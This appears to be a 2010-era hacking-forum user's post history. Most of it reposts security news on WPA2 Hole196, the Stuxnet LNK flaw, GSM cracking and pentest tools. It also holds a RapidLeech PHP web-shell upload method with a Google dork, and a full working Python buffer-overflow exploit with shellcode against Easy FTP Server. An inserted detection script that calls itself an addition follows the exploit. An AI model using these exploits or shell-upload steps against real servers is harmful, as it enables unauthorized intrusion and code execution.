Everything posted by begood
-
Files for analysis are not yet available. Source: Zombie Infection Kit
-
WPA2, perceived as the most solid Wi-Fi security protocol, is widely used by enterprises for securing their Wi-Fi networks. But security researchers at AirTight have uncovered a vulnerability called "Hole196" in the WPA2 security protocol that exposes WPA2-secured Wi-Fi networks to malicious insiders. Exploiting the vulnerability, an insider can bypass WPA2 private key encryption and authentication to sniff and decrypt data from other authorized users as well as scan their Wi-Fi devices for vulnerabilities, install malware and possibly compromise those Wi-Fi devices. AirTight researcher Md. Sohail Ahmad will be demonstrating this vulnerability at the Black Hat Arsenal and at DEFCON18 in a presentation entitled "WPA Too?!" in Las Vegas on July 29th and July 31st respectively.

WPA 2 Hole 196 Vulnerability
-
Features:
- Issue scan commands remotely
- Wireless 802.11b ready
- Gigabit Ethernet capable
- 1.2 GHz processor
- Linux, Perl, PHP, MySQL on-board
- Covertly disguised as power adapter
- Capable of invoking most Linux-based scan apps & scripts
- Intelligent scan engine
- Very low voltage use

PlugBot is a research project and I plan to release the code for free under GPL license. Please help me fund this project by donating via Paypal!

PlugBot is a drive-by bot. It is a covert penetration testing device designed for use during physical penetration tests. PlugBot is a tiny computer that looks like a power adapter; this small size allows it to go physically undetected while being powerful enough to scan, collect and deliver test results externally.

How do you use it? Gain access to the target location (conference room?), plug the PlugBot into the nearest wall outlet and walk out. The PlugBot is configured to make an external connection (Wi-Fi or Ethernet) to a specified IP address to receive instructions. Central Command allows the penetration tester to invoke scripts and applications. Output as a result of testing is encrypted and securely transmitted to the Drop Zone, where data is imported into Central Command for analysis by the pen tester.

What's inside? What makes this little guy run is a 1.2 GHz processor, 512 MB RAM and drawing just under 5 watts of power. Extra hard disk space can be added with an SD card. Here are some of the on-board components: 802.11b, Gigabit Ethernet, Bluetooth, 1.2 GHz processor, 512 MB RAM, USNAP I/O, MicroSD socket and more.

About the Inventor: PlugBot was brought to life by security researcher and penetration tester Jeremiah Talamantes. Jeremiah (CISSP, CEH) has been in Information Security for over 13 years. He founded RedTeam Security, a Minneapolis-based IT Security consulting company, with a group of extremely talented close friends.

The PlugBot ~ The PlugBot is a small form factor computer used for Physical Penetration Testing
-
IDG News Service - The Windows attack used by a recently discovered worm is being picked up by other virus writers and will soon become much more widespread, according to security vendor Eset. Eset reported Thursday that two new families of malicious software have popped up, both of which exploit a vulnerability in the way Windows processes .lnk files, used to provide shortcuts to other files on the system. The vulnerability was first exploited by the Stuxnet worm, discovered on computer systems in Iran last month. Highly sophisticated, Stuxnet targets systems running Siemens industrial control system management software. The worm steals SCADA (supervisory control and data acquisition) project files from Siemens' computer systems. Siemens issued a Security Update for its customers on Thursday, but Microsoft has yet to patch the Windows bug that permits the worm to spread. The newly discovered malware is "far less sophisticated" than Stuxnet and "suggests bottom feeders seizing on techniques developed by others," said Eset researcher Pierre-Marc Bureau, writing in a blog post. One of the new samples installs a keystroke logger, a tool hackers use to steal passwords and other data, on the victim's computer. "The server used to deliver the components used in this attack is presently located in the US, but the IP is assigned to a customer in China," Bureau said. The other variant could be used to install one of several different pieces of malicious software. As each new variant of the attack pops up, it adds pressure on Microsoft to patch the underlying vulnerability. Microsoft's next set of security patches is due Aug. 10, but if enough customers get infected, the company may be forced to rush out an emergency patch for the issue. Microsoft has already posted a temporary workaround to the problem and says it is working on a patch.
Right now, the Stuxnet worm makes up a very tiny volume -- less than 1/100th of a percent -- of the malware that Eset is seeing on the Internet, said Randy Abrams, Eset's director of technical education, in an interview. However, that's likely to change. "It's likely to become one of the most prevalent attack vectors," he said. "I expect that within a few months, we'll see hundreds if not thousands of pieces of malware using the link vulnerability."

Virus writers are picking up new Microsoft attack - Computerworld

// Microsoft could write a worm that automatically patches the vulnerable system after it reaches another vulnerable system, but they won't do it.
-
What an interesting SHA1 hash it has!
-
Who says it's only a kill switch?
-
Computer maker Dell is warning, according to The Register, that some of its server motherboards have been delivered to customers carrying an unwanted extra: computer malware. It could be confirmation that the "hardware trojans" long posited by some security experts are indeed a real threat. Unlike hard-drive-based computer viruses which can be disabled by antivirus software, a hardware trojan lives out of reach of such defences. It comprises some kind of alteration - by sabotage or accident - to the very heart of a computer: its microprocessors, memory chips or circuit boards. News that Dell may have a hardware trojan problem emerged on a support forum after a user was warned by a Dell call centre that the firm's PowerEdge R410 server motherboard contains spyware of unspecified function that a Dell engineer needed to come and remove. Dell confirms on the same forum: "The potential issue involves a small number of PowerEdge server motherboards sent out through service dispatches that may contain malware. This malware code has been detected on the embedded server management firmware." Firmware is the semi-permanent software that controls vital internal components. It will be fascinating to find out how the malware got into Dell's firmware, not least because firmware should have been subject to high physical and computer security procedures. But the threat of hardware Trojans has been recognised at the highest levels. The Pentagon is spending millions on research designed to ensure it can trust the microchips in critical systems, especially those made outside the US. Elsewhere, researchers are also investigating the threat from would-be chip-plant saboteurs, who poison the chip-making processes to introduce a "kill switch" that makes the chip fail unexpectedly. Short Sharp Science: PC giant warns of hardware trojan
-
# Exploit Title: RapidLeech Scripts Remote File Upload (upload shell php)
# Date: 21/07/2010
# Author: H-SK33PY
# Software Link: http://www.rapidleech.com/
# Version: all versions
# Google dork: intitle:"Rx08.ii36B.Rv"
# Platform / Tested on: linux
# Category: remote
# Code: N/A

Iranian Datacoders Security Team 2010

#BUG:
After finding a site running the RapidLeech script: to make this method work, change the name of the shell, for example shell.php to shell.php.001 or shell.php.00. After transferring it you can run it at this URL: http://site.com/0x14/shell.php.001 or http://site.com/0x14/shell.php.00

Website: http://www.datacoders.ir
Special Thanks to: ccC0d3rZzz & all iranian datacoders members
-
IDG News Service - The GSM (Global System for Mobile Communications) technology used by the majority of the world's mobile phones will get some scrutiny at next week's Black Hat security conference, and what the security researchers there have to say isn't pretty. On Friday, an open source effort to develop GSM-cracking software released software that cracks the A5/1 encryption algorithm used by some GSM networks. Called Kraken, this software uses new, very efficient encryption cracking tables that allow it to break A5/1 encryption much faster than before. The software is a key step toward eavesdropping on mobile phone conversations over GSM networks. Since GSM networks are the backbone of 3G, they also provide attackers with an avenue into the new generation of handsets. In December, the group released a set of encryption tables designed to speed up the arduous process of breaking A5/1 encryption, but the software component was incomplete. Now the software is done, and the tables are much more efficient than they were seven months ago. "The speed of how fast you could crack a call is probably orders of magnitude better than anything previously," said Frank Stevenson, a developer with the A5/1 Security Project. "We know we can do it in minutes; the question is, can we do it in seconds?" As the software becomes more polished it will make GSM call eavesdropping practical. "Our attack is so easy to carry out, and the cost of attack is lowered so significantly, that there is now a real danger of widespread intercepting of calls," Stevenson said. Stevenson and his co-developers haven't put together all the components someone would need to listen in on a call -- that would be illegal in some countries. Someone must still develop the radio listening equipment needed to gain access to the GSM signal, but that type of technology is within reach.
Stevenson believes that this could be done using an inexpensive mobile phone and a modified version of open-source software called OsmocomBB. Hackers could also use a more-expensive Universal Software Radio Peripheral (USRP) device in conjunction with another program, called Airprobe. A5/1 Security Project leader Karsten Nohl will discuss the hardware and software setup for his project's GSM cracking tools at next week's conference. Last year there were about 3.5 billion GSM phones in use, according to data from the GSM Association. Not all of these phones are on networks that use A5/1 encryption -- some use the more-secure A5/3 algorithm; others use no encryption -- but a sizeable percentage are. In the U.S., both AT&T and T-Mobile operate GSM networks. The trade group that represents GSM network operators and equipment manufacturers, the GSM Association, has said in the past that A5/1 cracking efforts such as this are interesting, but attacks are extremely difficult to pull off in the real world. Intercepting mobile phone calls is illegal in many countries, including the U.S. The GSM Association did not respond to messages seeking comment for this story. Project developers say the point of their work is to show how easy it really would be to crack A5/1 -- something they say that grey market commercial products are already doing. According to Stevenson many of these security problems are solved in next-generation mobile network technologies such as 3G and LTE (Long Term Evolution). However, even 3G phones can be compromised because they can roll back to GSM mode when a 3G network is not available. "You can choose to operate in 3G mode only, but then you will have very limited coverage," Stevenson said. "GSM has become the Achilles heel of 3G security." Meanwhile, another Black Hat presenter, Chris Paget, plans to demonstrate a completely different way to intercept GSM calls. He's setting up a fake cellular tower that masquerades as a legitimate GSM network.
According to Paget, using open-source tools and a US$1,500 USRP radio, he can assemble his fake tower, called an IMSI (International Mobile Subscriber Identity) catcher. In a controlled experiment, he's going to set one up at Black Hat and invite audience members to connect their mobile phones. Once a phone has connected, Paget's tower tells it to drop encryption, giving him a way of listening in on calls. "I think there's been too much focus on the cryptographic weaknesses in GSM," he said. "People need to recognize that the cryptographic weaknesses are not the worst weaknesses in GSM."

New 'Kraken' GSM-cracking software is released - Computerworld
-
Add me and we'll talk - I'm a fractal freak
-
prodil, you just described a fractal universe. What image do you have as your avatar?
-
This is something that I used to always think about and just stop at thinking! But the author of Shell of the Future has not only done it, but done it quite impressively. We had to rely on a lot of things and do a lot of stuff to show that a page was actually vulnerable to cross-site scripting (XSS). But thanks to this tool, it is very easy to leave behind the ubiquitous "alert()" while displaying an XSS vulnerability to your clients. You can do a lot more!

Shell of the Future is a Reverse Web Shell handler. In other words, it is the browser equivalent of a reverse command shell! Instead of a command prompt from which you type in commands that get executed on the remote computer, you get to browse the victim's HTTP/HTTPS session from your browser. Even though the site is being browsed from your browser, all the pages are fetched by the victim's browser by tunneling HTTP over HTTP using HTML5 Cross Origin Requests. The hijacked session also displays a hovering banner which can be customized, making it the perfect POC for your pentest report.

But how do you browse the victim's HTTP/HTTPS session from your browser? Simple: you set the victim's browser to use Shell of the Future's proxy server, start the tool and visit http://127.0.0.1/sotf.console from his browser. This can be done easily using JavaScript, or manually too!

This is the architecture of Shell of the Future. It has two main components:

Proxy Server: The pentester's browser must be configured to use this as the proxy server. The proxy server listens on port 1337 by default. All requests sent by the pentester's browser are captured by this proxy, which converts them into JSON messages and sends them to the Shell of the Future web server. It regularly polls the web server to test if responses to those requests are available. If a response is available, the proxy processes the response body to make changes like adding a banner etc. (if enabled by the user) and sends the response to the pentester's browser. If the browser is requesting static files like css or jpg files, these are directly fetched from the server. This feature is also configurable and can be turned off if required.

Web Server: The web server gets all the requests from the proxy and stores them in a temporary database. When the victim polls the web server, the requests are sent to it. The victim fetches the responses for these requests from the server and sends them back to the web server, where they are again stored in the database. When the proxy polls the server looking for responses, this response is sent to it. The web server also serves JavaScript exploits to the victim.

The author has been gracious enough to add two JavaScript exploits for us! They are:

e1.js: This exploit is the simpler of the two. Once injected into the browser it polls the Shell of the Future server constantly, checking for any new requests that must be fetched. If any requests are available these are sent in JSON format. The exploit fetches individual requests from the JSON object, fetches each of them from the server, encodes the response in hex and then sends it over to the Shell of the Future server.

e2.js: This exploit performs all the functions that e1.js does and in addition has an added feature to increase the lifetime of the injected script. It adds an invisible link to the page and adds an 'onmousemove' event handler so that the link is always under the cursor. When the victim clicks anywhere on the page, this link gets clicked and it opens the same site in a new tab. The transition between these two is hardly noticeable and the victim would continue browsing the site in the new tab while the injected exploit would remain active in the other tab.

For the ones with a programming streak, you can include your own e3.js and e4.js JavaScripts and they will be treated as exploits for the tool.

As of now, everything is amazing with this tool. Just some caveats:
- Needs .NET framework 2.0 and above.
- If the proxy or the server component must listen on a port less than 1024, it must be run with administrator privileges.
- Does not work properly with Linux.
- Communication is a bit slow while browsing a victim's session as it is routed between three points.

Apart from these, we did not find any other problems with the tool. We know you must be interested in downloading it already! Download Shell of the Future v0.9 here.

Shell of the Future: A Reverse Web Shell Handler! - PenTestIT
-
So you don't wait an eternity for unetbootin (it extracts and writes to USB extremely slowly), here is what you can do:
1. Install TeraCopy (it's freeware).
2. Install WinRAR/7-Zip.
3. Extract the .iso image into a folder.
4. Format the stick, then copy the files from that folder onto the stick.
5. Run unetbootin with Diskimage ISO => the path to the iso.
6. When it asks whether to overwrite the files, click NO ... x times (until it gets past the verification part).
7. Let it install the bootloader, then restart and boot from the USB stick.
For example, installing Mandriva on a stick via unetbootin took me 2 hours just copying the files. With the method above everything was done in 10 min (max).
-
Microsoft is warning that attackers are exploiting a critical unpatched Windows vulnerability using infected USB flash drives. The bug admission is the first that affects Windows XP Service Pack 2 (SP2) since Microsoft retired the edition from support, researchers said. When Microsoft does fix the flaw, it will not be providing a patch for machines still running XP SP2. In a security advisory, Microsoft confirmed what other researchers had been saying for almost a month: Hackers have been exploiting a bug in Windows "shortcut" files, the placeholders typically dropped on the desktop or into the Start menu to represent links to actual files or programs. (See also "The Ultimate Guide to Windows 7 Security.") "In the wild, this vulnerability has been found operating in conjunction with the Stuxnet malware," Dave Forstrom, a director in Microsoft's Trustworthy Computing group, said in a post Friday to a company blog. Stuxnet is a clan of malware that includes a Trojan horse that downloads further attack code, including a rootkit that hides evidence of the attack. Forstrom characterized the threat as "limited, targeted attacks," but the Microsoft group responsible for crafting antivirus signatures said it had tracked 6,000 attempts to infect Windows PCs as of July 15. On Friday, Siemens alerted customers of its Simatic WinCC management software that attacks using the Windows vulnerability were targeting computers used to manage large-scale industrial control systems used by major manufacturing and utility companies. The vulnerability was first mentioned on June 17 in an alert issued by VirusBlokAda, a little-known security firm based in Belarus. Other security organizations, including U.K.-based Sophos and SANS Institute's Internet Storm Center, picked up on the threat Friday. Security blogger Brian Krebs, formerly with the Washington Post, reported on it Thursday.

According to Microsoft, Windows fails to correctly parse shortcut files, identified by the ".lnk" extension. The flaw has been exploited most frequently using USB flash drives. By crafting a malicious .lnk file, hackers can hijack a Windows PC with little user interaction: All that's necessary is that the user views the contents of the USB drive with a file manager like Windows Explorer. Chester Wisniewski, a senior security advisor with Sophos, called the threat "nasty," and said his tests showed that the exploit works even when AutoRun and AutoPlay -- two functions that have previously been used by attackers to commandeer PCs using infected flash drives -- are disabled. The rootkit also bypasses all security mechanisms in Windows, including the User Account Control (UAC) prompts in Vista and Windows 7, said Wisniewski in a blog entry Friday. Attacks can also be launched without using USB drives, Microsoft and Wisniewski both noted. "Affected shortcuts can also be distributed over network shares or remote WebDAV shares," said Microsoft's advisory. "[That makes] a very bad situation worse," said Wisniewski. Microsoft did not set a timeline for patching the zero-day vulnerability; its next Patch Tuesday is not until Aug. 10. For now, Microsoft said users could block attacks by disabling the displaying of shortcuts, and turning off the WebClient service. Both moves require editing the Windows registry, a chore most people avoid for fear of crippling their computers. Disabling shortcut files also will make it more difficult for users to launch programs or open documents. That advice is all the help that those still running Windows XP SP2, the service pack that was retired from all support last Tuesday, will get from Microsoft. "Noticeably absent from [Microsoft's list of affected software] are Windows 2000 and Windows XP SP2 as they are no longer supported," said Wisniewski. "They are, however, definitely still vulnerable."

Microsoft also retired all editions of Windows 2000 from support last week. Wolfgang Kandek, the chief technology officer of Qualys, echoed Wisniewski's concerns about XP SP2 and Windows 2000 going patchless. "We assume the attack works against both of them and attackers will surely take advantage of this security hole," Kandek said Saturday. Microsoft said that all still-supported versions of Windows, including Windows XP SP3, Vista, Server 2003, Windows 7, Server 2008 and Server 2008 R2, contain the bug. The betas of Windows 7 SP1 and Server 2008 R2 SP1, which the company released last week, are also at risk. Windows XP SP2 users must upgrade to XP SP3 to receive a patch for the shortcut flaw when it eventually ships.

Microsoft Warns of Zero-Day Windows Hole - PCWorld
http://rstcenter.com/forum/24397-vulnerability-windows-lnk-files.rst
http://rstcenter.com/forum/24396-cve-2010-2568-lnk-code-execution-proof-concept.rst#post162288
-
Workaround refers to a setting or configuration change that does not correct the underlying issue but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

• Disable the displaying of icons for shortcuts

Note: Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.

1. Click Start, click Run, type Regedit in the Open box, and then click OK.
2. Locate and then click the following registry key: HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler
3. Click the File menu and select Export.
4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save. Note: This will create a backup of this registry key in the My Documents folder by default.
5. Select the value (Default) in the right-hand window of the Registry Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter.
6. Restart explorer.exe or restart the computer.

Impact of workaround: Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

• Disable the WebClient service

Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.

To disable the WebClient Service, follow these steps:
1. Click Start, click Run, type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Disabled. If the service is running, click Stop.
4. Click OK and exit the management application.

Impact of workaround: When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.

How to undo the workaround. To re-enable the WebClient Service, follow these steps:
1. Click Start, click Run, type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Automatic. If the service is not running, click Start.
4. Click OK and exit the management application.

http://www.microsoft.com/technet/security/advisory/2286198.mspx
-
We've received plenty of information over the past couple of days about this alleged vulnerability in Windows's "lnk" file, and its use against "SCADA" networks.

Windows Shortcut Flaw underpins power plant Trojan - The Register
Experts Warn of New Windows Shortcut Flaw - Krebs on Security

UPDATE: Two of our Handlers have copies of it now on their analysis systems. Thank you, we will analyze it.

UPDATE 2: We have been notified via our comments that Symantec has definitions for this malware as well now.

-- Joel Esler | http://blog.joelesler.net | Joel Esler (JoelEsler) on Twitter

UPDATE 3 (from Bojan): Microsoft posted the advisory about the vulnerability in Windows Shell that has been exploited in some targeted attacks (the advisory is at Microsoft Security Advisory (2286198): Vulnerability in Windows Shell Could Allow Remote Code Execution). I've tested the exploit and can confirm that it works in Windows XP, Vista and Windows 7.

The exploit uses a specially crafted LNK file. This file allows the attacker to execute an arbitrary file by carefully specifying its location; the LNK file in itself does not exploit any vulnerability such as buffer overflows, for example, so it is a legitimate LNK file. The LNK file used in targeted attacks was manually crafted, as some fields that are normally present, such as CreationTime, AccessTime or WriteTime, are all set to 0.

I will not be posting details about how the exploit works, but here are some things that you should be aware of:
- If autorun is disabled, when a USB device with malicious LNK files is inserted, the exploit will not be triggered automatically.
- The exploit is triggered every time a folder containing a malicious LNK file is opened (for example, with Windows Explorer). It does not matter where this folder is; it does not have to be on a USB device, but in order to execute the malicious binary, the attacker has to specify its location correctly.
- What makes this vulnerability extremely serious is the fact that it can be opened from any place, including remote shares, for example. The victim just has to browse to the remote share in order to trigger the vulnerability. So double check permissions on any remote shares you use in your companies (you shouldn't allow users to write in root folders, for example).

Some AV vendors started adding detection for these LNK files, although it is still very, very bad. We will, of course, keep an eye on the development of this.

Vulnerability in Windows "LNK" files?
http://rstcenter.com/forum/24396-cve-2010-2568-lnk-code-execution-proof-concept.rst#post162288
-
Ivanlef0u released a PoC for the exploit used in targeted attacks: http://ivanlef0u.nibbles.fr/repo/suckme.rar

More information: ISC SANS, US-CERT 940193

Callstack:

kd> g
Breakpoint 1 hit
eax=00000001 ebx=00f5ee7c ecx=0000c666 edx=00200003 esi=00000001 edi=7c80a6e4
eip=7ca78712 esp=00f5e9c4 ebp=00f5ec18 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
SHELL32!_LoadCPLModule+0x10d:
001b:7ca78712 ff15a0159d7c    call    dword ptr [SHELL32!_imp__LoadLibraryW (7c9d15a0)] ds:0023:7c9d15a0={kernel32!LoadLibraryW (7c80aeeb)}

kd> dd esp
00f5e9c4  00f5ee7c 000a27bc 00f5ee78 00000000
00f5e9d4  00000020 00000008 00f5ee7c 00000000
00f5e9e4  00000000 0000007b 00000000 00000000
00f5e9f4  00200073 002000e0 0000064c 0000028c
00f5ea04  1530000a 00000000 003a0043 0064005c
00f5ea14  006c006c 0064002e 006c006c 006d002e
00f5ea24  006e0061 00660069 00730065 00000074
00f5ea34  00090608 7c92005d 00000000 00000007

kd> db 00f5ee7c
00f5ee7c  43 00 3a 00 5c 00 64 00-6c 00 6c 00 2e 00 64 00  C.:.\.d.l.l...d.
00f5ee8c  6c 00 6c 00 00 00 92 7c-c8 f2 f5 00 00 17 72 02  l.l....|......r.
00f5ee9c  4b d2 00 00 d8 f2 f5 00-8b d2 a1 7c 00 00 00 00  K..........|....
00f5eeac  ac 80 9d 7c 30 d8 0d 00-34 d8 0d 00 b8 d7 0d 00  ...|0...4.......
00f5eebc  9a d2 a1 7c 30 d8 0d 00-c8 f2 f5 00 50 40 15 00  ...|0.......P@..
00f5eecc  50 40 15 00 00 00 00 00-b8 00 92 7c 40 b7 0c 00  P@.........|@...
00f5eedc  a8 ef f5 00 41 00 92 7c-18 07 09 00 5d 00 92 7c  ....A..|....]..|
00f5eeec  c8 f2 f5 00 00 ef f5 00-00 00 00 00 b8 00 92 7c  ...............|

kd> kv
ChildEBP RetAddr  Args to Child
00f5ec18 7ca81a74 00f5ee7c 000a27bc 00f5f2c4 SHELL32!_LoadCPLModule+0x10d (FPO: [1,145,4])
00f5ee50 7ca82543 00f5ee74 000a27bc 000a27c0 SHELL32!CPL_LoadAndFindApplet+0x4a (FPO: [4,136,4])
00f5f294 7cb56065 000a25b4 000a27bc 000a27c0 SHELL32!CPL_FindCPLInfo+0x46 (FPO: [4,264,4])
00f5f2b8 7ca13714 00000082 00000000 00000104 SHELL32!CCtrlExtIconBase::_GetIconLocationW+0x7b (FPO: [5,0,0])
00f5f2d4 7ca1d306 000a25ac 00000082 00f5f570 SHELL32!CExtractIconBase::GetIconLocation+0x1f (FPO: [6,0,0])
00f5f410 7ca133b6 000dd7e0 00000082 00f5f570 SHELL32!CShellLink::GetIconLocation+0x69 (FPO: [6,68,4])
00f5f77c 7ca03c88 000dd7e0 00000000 0015aa00 SHELL32!_GetILIndexGivenPXIcon+0x9c (FPO: [5,208,4])
00f5f7a4 7ca06693 00131c60 000dd7e0 0015aa00 SHELL32!SHGetIconFromPIDL+0x90 (FPO: [5,0,4])
00f5fe20 7ca12db0 00131c64 0015aa00 00000000 SHELL32!CFSFolder::GetIconOf+0x24e (FPO: [4,405,4])
00f5fe40 7ca15e3c 00131c60 00131c64 0015aa00 SHELL32!SHGetIconFromPIDL+0x20 (FPO: [5,0,0])
00f5fe68 7ca03275 000f8090 0014d5b0 0014a910 SHELL32!CGetIconTask::RunInitRT+0x47 (FPO: [1,2,4])
00f5fe84 75f11b9a 000f8090 75f11b18 75f10000 SHELL32!CRunnableTask::Run+0x54 (FPO: [1,1,4])
00f5fee0 77f49598 00155658 000cb748 77f4957b BROWSEUI!CShellTaskScheduler_ThreadProc+0x111 (FPO: [1,17,0])
00f5fef8 7c937ac2 000cb748 7c98e440 0014cfe0 SHLWAPI!ExecuteWorkItem+0x1d (FPO: [1,0,4])
00f5ff40 7c937b03 77f4957b 000cb748 00000000 ntdll!RtlpWorkerCallout+0x70 (FPO: [Non-Fpo])
00f5ff60 7c937bc5 00000000 000cb748 0014cfe0 ntdll!RtlpExecuteWorkerRequest+0x1a (FPO: [3,0,0])
00f5ff74 7c937b9c 7c937ae9 00000000 000cb748 ntdll!RtlpApcCallout+0x11 (FPO: [4,0,0])
00f5ffb4 7c80b729 00000000 00edfce4 00edfce8 ntdll!RtlpWorkerThread+0x87 (FPO: [1,7,0])
00f5ffec 00000000 7c920250 00000000 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])
Secdev - Thierry Zoller: CVE-2010-2568 - LNK Code execution - Proof of concept
-
Cheat Sheets & Quick Reference Cards for Developers | DevCheatSheet.com
-
#!/usr/bin/python
import socket, sys

# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]

print """
# **************************************************************************** #
#                                                                              #
#   * Easy FTP Server v1.7.0.11 [MKD] Remote BoF Exploit Post Authentication * #
#   * Author / Discovered by : Karn Ganeshen                                 * #
#   * Date : July 5, 2010                                                    * #
#   * KarnGaneshen [aT] gmail [d0t] com                                      * #
#   * http://ipositivesecurity.blogspot.com                                  * #
#                                                                              #
# **************************************************************************** #
"""

if len(sys.argv) != 3:
    print "Usage: ./easyftp_mkd.py <Target IP> <Port>"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

# Buffer needed -> 272 bytes
# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ]
shellcode = (
    "\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1"
    "\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5"
    "\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69"
    "\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e"
    "\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8"
    "\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08"
    "\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c"
    "\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c"
    "\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80"
    "\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b"
    "\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84"
    "\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14"
    "\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c"
    "\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e"
    "\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8"
    "\x51\x6b\x28"
)

nopsled = "\x90" * 40
# MAGIC RET 00883B10 (SP2) / 00893B58 (SP3) [ EBP points to nopsled when overflowed ]
ret = "\x10\x3B\x88\x00"

# 40 + 228 + 4 = 272 bytes: sled, shellcode, then the overwritten return address
payload = nopsled + shellcode + ret

print "[+] Launching exploit against " + target + "..."

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
    print "[+] Connected!"
except socket.error:
    print "[!] Connection failed!"
    sys.exit(0)

s.recv(1024)

# Targetting default user 'anonymous' on the target
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)

print "[+] Sending payload..."
s.send('MKD ' + payload + '\r\n')

print "[!] Verifying if the user has 'Create Directory' permission. This may take some time..."
try:
    # A reply means the server survived and rejected the MKD; a dropped
    # connection means the overflow was reached.
    s.recv(1024)
    print "[!] Uhh.. User does not have MKD privilege. +++Exploit failed+++"
except socket.error:
    print "[+] +++Exploit Successful+++ ^_^"

s.close()
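A defender-side counterpart to the PoC above, added here and not part of the original post or of Easy FTP Server: a check over raw FTP command lines that flags the shape of this MKD overflow (a post-login MKD argument at or beyond the 272-byte buffer, a 0x90 NOP sled, mostly non-printable bytes). The sample sessions are constructed; the 272-byte threshold and the 4-byte return address come from the PoC, the repeated filler bytes stand in for the real shellcode.

```python
import re
from collections import namedtuple

# The PoC needs 272 bytes to reach the saved return address; any single
# MKD argument near that size is far longer than a real directory name.
MKD_OVERFLOW_LEN = 272
NOP_SLED_RE = re.compile(rb"\x90{16,}")

Alert = namedtuple("Alert", "session reason")


def inspect_ftp_command(line):
    """Return the reasons a raw FTP command line resembles the MKD overflow."""
    reasons = []
    cmd, _, arg = line.rstrip(b"\r\n").partition(b" ")
    if cmd.upper() != b"MKD":
        return reasons
    if len(arg) >= MKD_OVERFLOW_LEN:
        reasons.append("MKD argument of %d bytes (>= %d)" % (len(arg), MKD_OVERFLOW_LEN))
    if NOP_SLED_RE.search(arg):
        reasons.append("NOP sled (0x90 run) in MKD argument")
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7e)
    if nonprint > len(arg) // 4:
        reasons.append("%d non-printable bytes in MKD argument" % nonprint)
    return reasons


def scan_session(session, lines):
    """Walk one control-connection's commands. The bug is reached only after
    login, so MKD lines before a PASS are ignored."""
    alerts = []
    logged_in = False
    for line in lines:
        if line.upper().startswith(b"PASS "):
            logged_in = True
            continue
        if logged_in:
            for reason in inspect_ftp_command(line):
                alerts.append(Alert(session, reason))
    return alerts


# Constructed sample traffic: a benign session and one shaped like the PoC
# (40-byte sled + 228 bytes of filler + 4-byte return address = 272).
BENIGN = [b"USER anonymous\r\n", b"PASS anonymous\r\n", b"MKD uploads\r\n"]
ATTACK = [b"USER anonymous\r\n", b"PASS anonymous\r\n",
          b"MKD " + b"\x90" * 40 + b"\xda\xc0\xd9" * 76 + b"\x10\x3b\x88\x00" + b"\r\n"]

if __name__ == "__main__":
    for name, lines in (("benign", BENIGN), ("attack", ATTACK)):
        for alert in scan_session(name, lines):
            print("%s: %s" % (alert.session, alert.reason))
```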
-
We wrote about the Bruter v1.0 ALPHA version back in 2008; recently they announced the release of v1.0 Final! Bruter is a parallel network login brute-forcer on Win32. This tool is intended to demonstrate the importance of choosing strong passwords. The goal of Bruter is to support a variety of services that allow remote authentication. It currently supports the following services:

FTP
